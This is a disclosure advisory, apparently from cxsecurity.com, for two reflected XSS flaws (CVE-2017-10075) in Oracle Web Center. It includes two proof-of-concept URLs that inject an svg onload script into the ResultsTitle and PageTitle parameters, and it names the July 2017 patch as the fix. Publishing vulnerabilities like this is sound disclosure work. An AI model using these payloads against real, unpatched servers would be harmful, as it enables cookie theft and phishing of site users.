Oracle Web Center 11.1.1.9.0 / 12.2.1.1.0 / 12.2.1.2.0 XSS

2017.07.23
Credit: Owais
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

Oracle Web Center XSS Details ======================================================================================== Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0] Security-Risk: High Remote-Exploit: yes Vendor-URL: https://www.oracle.com/ CVE-ID: CVE-2017-10075 CVSS: 8.2 Credits ======================================================================================== Discovered by: Owais Mehtab & Tayeeb Rana Affected Products: ======================================================================================== Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0] Description ======================================================================================== Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center, the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user. Proof of Concept ======================================================================================== http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)> Solution ======================================================================================== Apply Oracle CPU July 2017 -- Regards, Owais Mehtab & Tayeeb Rana


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top